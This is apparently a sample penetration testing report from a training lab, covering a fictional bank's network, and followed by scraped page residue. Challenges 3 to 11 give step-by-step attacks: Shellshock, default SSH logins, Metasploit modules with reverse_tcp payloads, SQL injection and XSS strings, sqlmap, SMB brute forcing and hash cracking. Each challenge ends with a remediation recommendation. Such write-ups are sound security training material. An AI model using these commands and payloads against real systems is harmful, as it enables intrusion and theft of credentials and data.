as per role based and need based.Conduct internal Audit to verify the same has been
implemented and followed.
CHALLENGE 3:
Objective:
Compromise the Ubuntu machine in the network. The challenge requires you to present the
hash value of the file "Customer Data.xlsx". This file contains customer sensitive
information such as credit card details.
versions
172.19.19.5 Linux Kernel 3.0 UBUNTU HOST 80 http

on Ubuntu 12.04

Threat Description: GNU Bash vulnerability, referred to as Shellshock or the "Bash Bug", was
disclosed. In short, the vulnerability allows remote attackers to execute arbitrary code given
certain conditions, by passing strings of code following environment variable assignments
Tools Used:
Dirbuster :
DirBuster is a multi threaded java application designed to brute force directories and files names
on web/application servers. Often is the case now of what looks like a web server in a state of
default installation is actually not, and has pages and applications hidden within. DirBuster
attempts to find these.
Burpsuite:
Burp Suite is an integrated platform for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial mapping
and analysis of an application's attack surface, through to finding and exploiting security
vulnerabilities.
Methodology:
Scanned for vulnerabilities
Figure.3.1
With the help of Dirbuster tool tried to brute force the ubuntu server and found the following files
and cgi-bin directory

Figure.3.2
With the help of

dirb found folder
cgi-bin/cinema
Figure.3.3
Browsed the
given below url
and intercepted in
Burpsuite tool
and it showed it
was a
demonstrattion of
shell shock
vulnerability

Figure 3.4
With the help of the given below script
Figure 3.5
With the given below script found the folders on the machine /home/Jason

Figure 3.6
With the given below script found the file Customer Data.xlsx file of which md5sum needs to be extracted.
Figure
3.7

With the given below script extracted the md5sum of the Customer Data.xlsx
Figure 3.8
Recommendation :Be sure to update all of your affected servers to the latest version of Bash! Also, be sure to keep
your servers up to date with the latest security update,
CHALLENGE 4:
Objective:
Compromise the Cent OS machine in the network. The challenge requires you to present the
hash value of the file named "Terms of Service". This file contains sensitive agreements between
FNB and their customers.
versions
172.17.0.3 Linux Kernel 2.6 CENTOS HOST 21 ftp

on CentOS 22 ssh
Release 6.4 Final 23 telnet
Threat Description:
A SSH bruteforce attack automatically and systematically attempts to guess the correct username
and private combination for a service. Its goal is to find valid logins and leverage them to gain
access to a network to extract sensitive data, such as password hashes and tokens
. Tools Used:

Greenbone Security Assistant :

The Greenbone Security Assistant is a web application that connects to the OpenVAS Manager
and OpenVAS Administrator to provide for a full-featured user interface for vulnerability
management.
Putty:
PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows
platform. PuTTY is open source software that is available with source code and is developed and
supported by a group of volunteers.
Methodology:
Done vulnerability assessment with the help of Greenbone Security Assistant and found the
below attached SSH brute force login with default login vulnerability.

Figure 4.1
Further extracted the default login credentials ie username:root and password:password as shown
below

Figure 4.2
With the help of Putty tool logged in to the server with default credentials ie username: root and password:
password

Figure 4.3
Once connected to the server ,with the help of “ls “ command listed the directory structure and searched for the file
name Terms of Service.pdf for whose md5sum is to be calculated.We found the file in the /home/Admin/Documents
folder.Finally extracted the md5sum of the pdf file as shown in the below figure

Figure 4.4
Recommendation:It is recommended that always follow standard password policy ie.minimum of 8 characters and
Alphanumeric with special characters and non guessable strong passwords.
CHALLENGE 5:
Objective:
Exploit one of the vulnerable applications in the machine named ACCOUNTS.
1. Present the hash value of a file named FNB_Trading_Summary.
2. Find the password of a user name Arnold.
versions
172.19.19.2 Microsoft ACCOUNTS 80 http

Windows 7 135 msrpc
1(SP1) ver 6.1 3389 ms-wbt-server
and Build 7601 49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
Threat Description:
The remote SSH server is configured to allow weak encryption algorithms
Tools Used:
Greenbone Security Assistant :
The Greenbone Security Assistant is a web application that connects to the OpenVAS Manager
and OpenVAS Administrator to provide for a full-featured user interface for vulnerability
management.
Cain & Abel : Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted
passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP
conversations, decoding scrambled passwords, recovering wireless network keys, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
Methodology:
Done vulnerability assessment with the help of Greenbone Security Assistant and found the
below attached SSH weak encryption Algorithm supported vulnerability.

Figure 5.1
SSH weak encryption Algorithm supported vulnerability result details

Figure 5.2
Searched for the exploit module of freesshd as shown below.

Figure 5.3
By using Kali Operating system machine, started the exploit process by opening command line terminal, and typed
msfconsole and pressed Enter. This launched msfconsole. And used exploit windows/ssh/Freesshd_Authbypass.
Then typed show options

Figure 5.4
And used exploit windows/ssh/Freesshd_Authbypass.The typed show options command as shown below to check
for the LHOST,RHOST,RPORT.
Then set the RHOST,RPORT ,set USER_FILE /usr/share/metasploit.framework/data/wordlists/unix_users.txt and
then exploit

Figure 5.5
Exploitation out as shown in figure below.

Figure 5.6
After gaining the meterpreter session with the help of shell command took windows machines access
Figure 5.7
From the command prompt of windows typed the command “dir FNB*.* /s “ and searched for the file
FNB_Trading_Summary.xls.Then exited from the shell command prompt and downloaded the file from the give
path below in screen shot.Exited from the meterpreter and came back to msfconsole and used

exploit/windows/local/ms13_081_track_popupmenu to further exploit and get hashdump of user Arnold.The typed

show options
Figure 5.7
Then set session 1 and then exploited and typed “hashdump” command and got the hash dump of users shown
below screen shot.Then copied the hashdump in a file Arnold.txt file and moved to www folder.

Figure 5.7
After getting the hashdump found the md5sum of the file FNB_Trading_Summary.xls.Then started Apache service
to browse and get the file Arnold.txt
Figure 5.8
As mentioned
above copied the
file to the www
folder.

Figure 5.9
Just displayed and verified the content of the hashdump is present in text file.
Figure 5.10
Installed Cain &Able tool to crack the password of the Arnold from the Hashdump Arnold.txt file and cracked the
password ie orange as shown below

Figure 5.11
Recommendation : Disable the weak encryption algorithms

CHALLENGE 6 :
Objective:
Perform a web application penetration test on FNB’s official website, www.fnb.com.
1. Perform an SQL injection test and log into the website as a customer without a password.
Attach a screenshot as proof of the successful exploit.
2. Perform an XSS attack and attach a screenshot as proof of successful exploit.
. Threat Description :
SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious
SQL statements (also commonly referred to as a malicious payload) that control a web
application’s database server (also commonly referred to as a Relational Database Management
System – RDBMS). Since an SQL Injection vulnerability could possibly affect any website or
web application that makes use of an SQL-based database, the vulnerability is one of the oldest,
most prevalent and most dangerous of web application vulnerabilities.
Cross-Site Scripting (XSS) is probably the most common singular security vulnerability existing
in web applications at large. It has been estimated that approximately 65% of websites are
vulnerable to an XSS attack in some form, a statistic which should scare you as much as it does
me.
Tools Used:
Methodology:to perform web application penetration test on FNB’s official website opened the
URL www.fnb.com.
Figure 6.1
After opening the website click on the login button

Figure 6.2
In the user name and password field and typed string Fnb’ 1=1’ -- in username and password field

Figure 6.3
Was able to do sql injection and logged in through user Smith as shown below.

Figure 6.4

Further to Perform an XSS attack went to Contact field of the website e and typed Name:
customer and inserted script in Message Field : <script>alert("YOUR SYSTEM IS HACKED
XSS")</SCRIPT> a
Figure 6.5
After inserting script in Message Field : <script>alert("YOUR SYSTEM IS HACKED XSS")</SCRIPT>

performed XSS attack with message “ HACKED XSS “ and screen shot given below.

Figure 6.6
Recommendation:
Input Validation is any web application’s first line of defense. That said, Input Validation is
limited to knowing what the immediate usage of an untrusted input is and cannot predict where
that input will finally be used when included in output. Practically all free text falls into this
category since we always need to allow for valid uses of quotes, angular brackets and other
characters.
CHALLENGE 7:
Objective:
Exploit the machine named “HRDEPT” and present the hash value of the file “Employee
Details.xlsx”.

versions
172.19.19.6 Microsoft HRDEPT 80 http

2012 Data 139 netbios-ssn
center Edition 445 netbios-ssn
3306 mysql
49152 mysql
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
49158 Msrpc
Threat Description: The content management used by HR department is in WORD PRESS and
WordPress is a database-backed platform that executes server-side scripts in PHP. Both of these
characteristic can make WordPress vulnerable to malicious URL insertion attacks. Commands
are sent to WordPress via URL parameters, which can be abused by hackers who know how to
construct parameters that WordPress may misinterpret or act on without authorization
Tools Used: Nessus : Nessus is a remote security scanning tool, which scans a computer and
raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to
any computer you have connected to a network.
WPS scan:WPScan is a black box WordPress vulnerability scanner
Methodology:
given below

Figure 7.1
Opened the url http://172..19.19.6 found the gievn below details

Figure 7.2
Further entering the project ECSA found that the content management system used is “ Word Press “

Figure 7.2
Further done view source of the webpage and found the results below

Figure 7.3
Using WPSscan (WordPress vulnerability scanner)

Figure 7.4
Run the command wpscan --url http://172.19.19.6/ecsa

Figure 7.5
Enumerating plugins from the passive detection and found inboundio-marketing plugins
Figure
7.6
Searched for the inboundio_marketing exploit and used exploit

exploit/windows/webapp/wp_inboundio_marketing_file_upload
Figure 7.7

The typed show options command as shown below to check for the RHOST,RPORT and TARGETURI
Figure
7.8
Then
set the
RHOST 172.19.19.6 and set the TARGETURI and confirmed by show options
Figure
7.9
Then
set the
TARGETURI /ECSA

Figure
7.10
Then
done
the
exploit to gain meterpreter session
Figure 7.11

Figure 7.12
After gaining the Meterpreter session with the help of search command search -f “Employee Details.xlsx” -d c:\
found the file.Then downloaded the file.
Figure
7.13
After
downloading the file extracted the md5sum of the file “Employee Details.xlsx” as shown in the screen shot below
Figure
7.14
Recommendation: There is a plugin vulnerability ie inboundio-marketing in the HR Dept website.Hence

recommend to remove the plugin.
CHALLENGE 8:
Objective:
Extract employee data from the Active Directory machine in the network. You need to
compromise and take control of the AD first.
versions
172.19.19.3 Microsoft WIN- 53 domain

Windows server ULY858KHQIP 80 http
2008 standard 88 kerberos-sec
with service 135 msrpc
pack 1 (SP1) ver 139 netbios-ssn
6.0 and Build 389 ldap
6001 445 microsoft-ds
464 kpasswd5
593 ncacn_http
636 tcpwrapped
3268 ldap
3269 tcpwrapped
3389 ms-wbt-server
5357 http
49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 ncacn_http
49157 msrpc
49158 msrpc
49161 msrpc
49165
Threat Description :
The most severe of the vulnerabilities could allow remote code execution if an attacker sent a
specially crafted SMB packet to a computer running the Server service. Firewall best practices
and standard default firewall configurations can help protect networks from attacks that originate
from outside the enterprise perimeter. Best practices recommend that systems that are connected
to the Internet have a minimal number of ports exposed.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert if
it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.
Methodology:
With the help of Nessus Tool done the Vulnerability assessment and found the SMB
vulnerability given below

Figure 8.1
Used the Nmap tool to breute force user name and password
Figure 8.2
With the help of nmap --script smb-brute.nse -p445 172.19.19.3 extracted the username ans password credential of
the Active directory server.

Figure 8.3
By using
Kali
Operating
system
machine,
started the
exploit
process
by
opening
command
line
terminal,
and typed
msfconsole and pressed Enter. This launched msfconsole.
Figure
8.4
Then
used the
exploit/windows/smb/psexec and typed show options command to see the module options

Figure
8.5
Then set
the
RHOST
172.19.19.3
Figure 8.6
The set SMBPass mango,SMBUser administrator

Figure
8.7
Set
payload
windows/meterpreter/reverse_tcp as shown below
Figure
8.8
Set
LHOST
192.168.0.5 and verified with the help of “Show option “ command

Figure 8.9
Set SMBPass mango and verified with show options

Figure 8.10
Then exploited the machine and gained meterpreter session.After gaining meterpreter exported Active directory
user data with the help of command line toll csvde -f “Employee Data.csv”

Figure 8.11
Downloaded the exported file Employee Data.csv file
Figure 8.12
Find the
extracted
Employee
Data.csv
file shown
in screen
shot.
Figure 8.13

Recommendation : It is recommended that always follow standard password policy ie.minimum of 8 characters and
CHALLENGE 9:
Objective:
Exploit web applications on the “ENTERTAINMENT” machine and perform the following
post exploitation activities:
1. Present the contact number for a user named Steve on the http://[Host IP]/moviescope
site.
2. Extract the Tables and users of the http://[Host IP]/xsecurity site.
3. Present the SQL server database version on this machine.
versions
10.10.0.2 ENTERTAINME 21 tcpwrapped

Microsoft NT 80 http
Enterprise 445 netbios-ssn
Service Pack 3389 ms-wbt-server
1(SP1) ver 6.1 49152 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
Threat Description:SQL injection is an attack in which malicious code is inserted into strings
that are later passed to an instance of SQL Server for parsing and execution. Any procedure that
constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server
will execute all syntactically valid queries that it receives. Even parameterized data can be
manipulated by a skilled and determined attacker.
The primary form of SQL injection consists of direct insertion of code into user-input variables
that are concatenated with SQL commands and executed. A less direct attack injects malicious
code into strings that are destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
The injection process works by prematurely terminating a text string and appending a new
command. Because the inserted command may have additional strings appended to it before it is
executed, the malefactor terminates the injected string with a comment mark "--". Subsequent
text is ignored at execution time.
Tools Used:
sqlmap : Sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers
Threat Description:SQL injection is an attack in which malicious code is inserted into strings
that are later passed to an instance of SQL Server for parsing and execution. Any procedure that
constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server
will execute all syntactically valid queries that it receives. Even parameterized data can be
manipulated by a skilled and determined attacker.
The primary form of SQL injection consists of direct insertion of code into user-input variables
that are concatenated with SQL commands and executed. A less direct attack injects malicious
code into strings that are destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
The injection process works by prematurely terminating a text string and appending a new
command. Because the inserted command may have additional strings appended to it before it is
executed, the malefactor terminates the injected string with a comment mark "--". Subsequent
text is ignored at execution time.
Methodology:
CH 9.1 Present contact number of user named Steve on http://10.10.0.2/moviescope
Typed the url http://10.10.0.2/moviescope in the browser and clicked on login button and typed script Movie‘ or
1=1 -- in username and password field and logged in
Figure
9.1.1
With
this got
logged
in with
the user
Adam as
shown
below
illustration

Figure 9.1.2

After logging in clicked on the “View Profile” and found the link illustrated below
10.10.0.2/moviescope/viewprofile.aspx?id=1
Figure 9.1.3
Just changed the id number from 1to 2 10.10.0.2/moviescope/viewprofile.aspx?id=2 and got the profile of John.

Figure 9.1.4
Just changed the id number from 2to 3 10.10.0.2/moviescope/viewprofile.aspx?id=3 and got the profile of Kety

Figure 9.1.5
Finally changed the id number from 3 to 4 10.10.0.2/moviescope/viewprofile.aspx?id=4 and got the profile of
Steve and got the contact number of steve as illustrated below.

Figure 9.1.6
CH 9.2: Extract the table and users of http://10.10.0.2/xsecurity site
To extract the table and user logged into site http://10.10.0.2/xsecurity and logged in as username:abhi and
password :abhi

Figure 9.2.1
The explored through Burpsuite tool and executed Burpsuite

Figure 9.2.2
Intercepted the url http://10.10.0.2/xsecurity site in burpsuite and found the below illustration.

Figure 9.2.3
After intercepting in Burpsuite,copy pasted the text in blue and red in a text file xsecurity.txt

Figure
9.2.4
Saved
the
text
file in
xsecurity.txt file in root folder

Figure 9.2.5
Then with the help of sqlmap command : sqlmap -r /root/xsecurity --dbs done automatic sql injection

Figure 9.2.6
In the below illustration we will see the 9 databases extracted ie
GoodShopping.Master,model,moviescope,msdb,queenhotel,Real_Home,tempdb,Xsecurity

Figure 9.2.7
Then with the help of sqlmap command : sqlmap -r /root/xsecurity -D xsecurity --tables done sql injection with the
help of the text file xsecurity.txt

Figure 9.2.8
Below illustration shows that sqlmap got a 302 redirect to http://10.10.0.2:8/xsecurity/index.aspx and txtusername is
vulnerable also shown the backend database server .operating system and web application technology.

Figure 9.2.9
In the below illustration extracted the 3 tables ie User_Profile,Users.comments of database Xsecurity

Figure 9.2.10
With the help of the given below command further extracted the columns of xsecurity database

Figure 9.2.11
Illustration shown below has 3 extracted column and type of xsecurity ie password,userid and username

Figure 9.2.12
9.3 Present the SQL Server Database version on this machine

With the help of the given below command sqlmap -r /root/xsecurity --banner found out the SQL server database
version of this machine

Figure 9.3.1
Found the illustrated details ie SQL server database verion id Microsoft SQL Server 2008 (RTM) 10.0.1600.22
(x64)

Figure 9.3.1
Recommendation : Input Validation is any web application’s first line of defense. That said, Input Validation is
limited to knowing what the immediate usage of an untrusted input is and cannot predict where that input will finally
be used when included in output. Practically all free text falls into this category since we always need to allow for
valid uses of quotes, angular brackets and other characters.
CHALLENGE 10:
Objective:
Compromise the MySQL database running on the “ECOMM” machine and extract the
table data. The username and password are weak and do not follow best practices.
versions

10.10.0.3 Microsoft ECOMM 80 http

Enterprise 445 netbios-ssn
Service Pack 3306 mysql
1(SP1) ver 6.1 3389 ms-wbt-server
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
Threat Description:
vulnerability in the MySQL server that could allow potential attackers to access MySQL
databases without inputting proper authentication credentials.An attacker can crack the password
hashes using dictionary attacks and maintain their unauthorized access on the server even if this
authentication bypass vulnerability is later fixed.
Tools Used:
HexorBase is a database application designed for administering and auditing multiple database
servers simultaneously from a centralized location, it is capable of performing SQL queries and
bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server,
Oracle, PostgreSQL ). HexorBase allows packet routing through proxies or even metasploit
pivoting antics to communicate with remotely inaccessible servers which are hidden within local
subnets.
Methodology:
With the help of Zenmap anyways we had found out mysql port 3306 is open

Figure 10.1
Used the HexorBase tool illustrated below

Figure 10.2
After opening hexorbase tool it prompted for user name and password

Figure 10.3
Further selected Database Bruteforce and selected Mysql and typed the server ip address ie 10.10.0.3 and selected
port 3306 and further selected user list and Word list

Figure 10.4
After selecting user list and word list started Dictionary attack and cracked the username and password of database
server ie username: root and password: test

Figure 10.5
Further logged in to the Mysql database server 10.10.0.3 with the help of the cracked username and password

Figure 10.6
Further extracted the Tables from the Mysql database Server as illustrated below

Figure 10.7
Further extracted the Tables from the Mysql Server as illustrated below

Figure 10.8
Further extracted the Tables from Information schema from the Mysql Server as illustrated below

Figure 10.9

Figure 10.10

Figure 10.11
Recommendation : It is recommended that always follow standard password policy ie.minimum of 8 characters and
CHALLENGE 11:
Objective:
Exploit the machine named as “RDDept” and present the hash value for the RnD NDA.pdf
document.

versions
172.19.19.9 Microsoft RDDEPT 21 ftp

Windows 8 pro 80 http
with service 135 msrpc
pack 1(SP1) ver 139 netbios-ssn
6.2 Build 9200 445 netbios-ssn
3306 mysql
3389 ms-wbt-server
49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
49158 msrpc
Threat Description: The vulnerability exists in the Media Manager component, which comes by
default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerabilities that malicious hackers could use to gain access to any computer you
have connected to a network.
Methodology:
given below

Figure 11.1
Just put the url 172.19.19.9 in web browser

Figure 11.2
Further browsed with the project mentioned ECSA ie 172.19.19.9/ECSA and right clicked and seen the view source
of the page

Figure 11.3
When done the view source found the open source content management used is Joomla

Figure 11.4
By using Kali Operating system machine, started the exploit process by opening command line terminal, and typed
msfconsole and pressed Enter. This launched msfconsole.

Figure 11.5
After launching msfconsole searched for Joomla exploit module

Figure 11.6
After searching joomla exploit module used exploit/unix/webapp/joomla_media_upload_exec and did show options

Figure 11.7
The set RHOST 172.19.19.9,set LHOST 192.168.0.5,set TARGETURI /ECSA abd verified with show options

Figure 11.8
Then searched for payloads with the help of command “show payloads”

Figure 11.9
After searching payloads Set payload to php/meterpreter/reverse_tcp and then exploited

Figure 11.10
Changed the directory path and came to c drive root and checked directory listings.Then changed the directory to
users and with the help of command in c:\users\search -f *.pdf

Figure 11.11
After searching the file downloaded the file to root and extracted the md5sum of the required file RnD NDA.pdf

Figure 11.12
Recommendation: Upgrade to the latest version of Joomla in which public access isn't allowed to the Media
Manager, and you will need to supply a valid username and password
Appendixes
Appendix A: References
1) https://support.microsoft.com/en-us/kb/958644
2) http://www.cve.mitre.org
3) http://www.cvedetails.com
4) https://www.acunetix.com/websitesecurity/sql-injection/
5) http://phpsecurity.readthedocs.io/en/latest/Cross-Site-Scripting-(XSS).html

6) http://www.esecurityplanet.com/open-source-security/top-5-wordpress-vulnerabilities-and-how-to-fix-them.html
7) https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-
vulnerability
8) http://tools.kali.org/vulnerability-analysis/hexorbase
9) http://www.cvedetails.com/cve/CVE-2013-5576/#references
Appendix B: Glossary
Black Box Black Box testing is used when the organization desires to test internal or external network
Penetration security from the perspective of an outsider with no knowledge of the organization, other than
Test: that which is in the public domain and freely available to anyone. The attacker has no advance
knowledge of the organization, except, perhaps, the name of the target. Black box testing most
closely simulates what an organization could expect from an outside attack in that, once any
discovered vulnerability is exploited and access to the network is gained, the attacker continues
to exploit a specific vulnerability as far as possible, with the ultimate goal of obtaining
administrative-level access to the vulnerable machine or extending network control to other
machines. Because only the first successful vulnerability is exploited, other vulnerabilities
within the network go untested and may lead to a false sense of security. Attacks are carried
out as covertly as possible. Once the attacks are observed and reported by the target
organization, black box testing ceases. Black box testing is also referred to as “no knowledge
testing.” It is the most unreliable form of penetration testing.
Crystal Box Crystal Box testing is used when the organization desires to test internal or external network
Penetration security from the perspective of an attacker with full and complete knowledge of the
Test organization, similar to the knowledge possessed by an administrator. This knowledge
normally includes passwords for routers, firewalls and IDS Systems, network topology,
machine configurations and other information that an IT administrator would possess. As many
discovered vulnerabilities as possible are exploited within the timeframe specified in the
engagement letter. Attacks may be carried out overtly or covertly, as the organization desires.
Crystal box testing provides the most thorough assessment of the security posture of the
network, in that multiple attack avenues are pursued with detailed knowledge of the
organization. Crystal box testing is also referred to as “full knowledge testing” or “white box
testing.”
Grey Box Grey Box testing is used when the organization desires to test internal or external network
Penetration security from the perspective of an attacker with only limited knowledge of the organization,
Test similar to the knowledge possessed by a non-IT employee. This knowledge normally includes
machine names, shared folder names, IP addresses, naming conventions and other information
that a normal user with no special access would know about the target organization. As many
discovered vulnerabilities as possible are exploited within the timeframe specified in the
engagement letter. Attacks may be carried out overtly or covertly, as the organization desires.
Grey box testing assures a more thorough assessment of the security posture of the network, in
that several possible attack avenues are pursued. Grey box testing is also referred to as “partial
knowledge testing.”
Internet Foot Internet foot printing uses the Internet to search for information in the public domain that could
Printing assist an attacker in gaining access to the target’s network. While some information placed in
the public domain is required by law, regulation, or to assist in conducting business, excess
information in the public domain could result in an attacker gaining enough knowledge to
conduct logical, physical or social engineering attacks against the target. Expected results of

Internet Footprinting are: location addresses, business hours, telephone and fax numbers,
contact names and e-mail addresses; partners; merger/acquisition news; privacy and security
policies in place; links to other Web servers; employee names and information; networking
equipment used; Web pages using input forms, assigned IP address ranges and Points of
Contact, etc.
Penetration The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate that
Test specific vulnerabilities, present in the organization’s network, can be used to compromise
network security. It uses intrusion techniques, identical or similar to methods used by attackers
to breach network security, collect data and elevate the attacker’s privileges within the
network. It can also reveal the extent to which an organization’s security incident response
capability is alerted by observing the organization’s response to attack methodologies.
Physical See Social Engineering
Penetration
Testing
Social Also called physical penetration testing. Social Engineering includes “successful or
Engineering unsuccessful attempts to influence a person(s) into either revealing information or acting in a
manner that would result in unauthorized access, unauthorized use, or unauthorized disclosure
to/of an information system, network or data” using human-based or computer based
techniques. In other words, using deception to con someone into providing information or
access they would not normally have provided. It’s the “human side” of breaking into a
network and preys on the qualities of human nature, such as the desire to be helpful, the
tendency to trust people and the fear of getting in trouble. Social engineering can also include
the practices of “dumpster diving” (searching the target’s refuse for useful information) and
“shoulder surfing” (obtaining passwords by surreptitiously watching a user type in their
password).
Vulnerability The objective of vulnerability testing is to discover possible attack vectors that can be used to
Assessment compromise the target network. It is a systematic examination of an information system or
product to determine the adequacy of security measures, identify security deficiencies, provide
data from which to predict the effectiveness of proposed security measures, and confirm the
adequacy of such measures after implementation.

Sample Penetration Testing Report Abhijitt Chougulle

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Sample Penetration Testing Report Abhijitt Chougulle

Uploaded by

Copyright:

Available Formats

Xsecurity, LLC CONFIDENTIAL Penetration Test Report for

FNB Financial Service

XSecurity, LLC FNB Financial Services,

CONFIDENTIAL Page | Error: Reference source not found

Document Title Penetration Testing Report

CONFIDENTIAL Page | Error: Reference source not found

Document Type Report

Author Abhijitt Chougulle

Pen Testers Abhijitt Chougulle,Sandeep Martis

Reviewed By Geeta Singh

Approved By Vikas Singh

Date Version Author Comments

Jan 6th, 2017 v1.3 Vikas Singh Final Draft

Name Title Company

Smith Penetration Testing Report FNB Financial Services

Name Company Role

Abhijitt Chougulle XSecurity, LLC Penetration Testing Data Collection

Name Abhijitt Chougulle

CONFIDENTIAL Page | Error: Reference source not found

[Challenge 2:] Network Scanning and Service Enumeration...................................................................................17

CONFIDENTIAL Page | Error: Reference source not found

1.0 Executive Summary

CONFIDENTIAL Page | Error: Reference source not found

1.1. Project Scope

1.2. Project Objectives

Target System Name FNB Financial Services

Target System URL http://www.fnb.com

Test Type Gray Box

Network Details Client-server

CONFIDENTIAL Page | Error: Reference source not found

The timeline of the test is as below:

1.7. Finding Rating Levels

should be addressed as soon as possible.

Figure 1: Risk Matrix

Value Number of Risks

CONFIDENTIAL Page | Error: Reference source not found

Figure 2: Summary of findings

1.2.2. Policies and Procedures

1.2.3. Critical Vulnerabilities

1.2.4. Identification and Authentication

1.2.5. Intrusion Detection

However, XSecurity, LLC strongly recommends that an Intrusion Detection and

1.3. Testing Methodology

2.0 Comprehensive Technical Report

Tools Used: Zenmap,SolarWinds,Nessus

CONFIDENTIAL Page | Error: Reference source not found

With the help of 172.19.19.1,172.17.0.1,10.10.0.1 further discovered live ip address of

Live hosts of Network (172.19.19.0) :-

CONFIDENTIAL Page | Error: Reference source not found

Live hosts of Network (172.17.0.0) :-

CONFIDENTIAL Page | Error: Reference source not found

Live hosts of Network (10.10.0.0) :-

CONFIDENTIAL Page | Error: Reference source not found

CONFIDENTIAL Page | Error: Reference source not found

Operating systems and their versions :

Operating System and version of Machine 10.10.0.2 :

CONFIDENTIAL Page | Error: Reference source not found

Operating System and version of Machine 10.10.03 :

CONFIDENTIAL Page | Error: Reference source not found

Operating System and version of Machine 172.17.0.2 :

CONFIDENTIAL Page | Error: Reference source not found

Operating System and version of Machine 172.17.0.3 :

CONFIDENTIAL Page | Error: Reference source not found

Operating System and version of Machine 172.19.19.1 :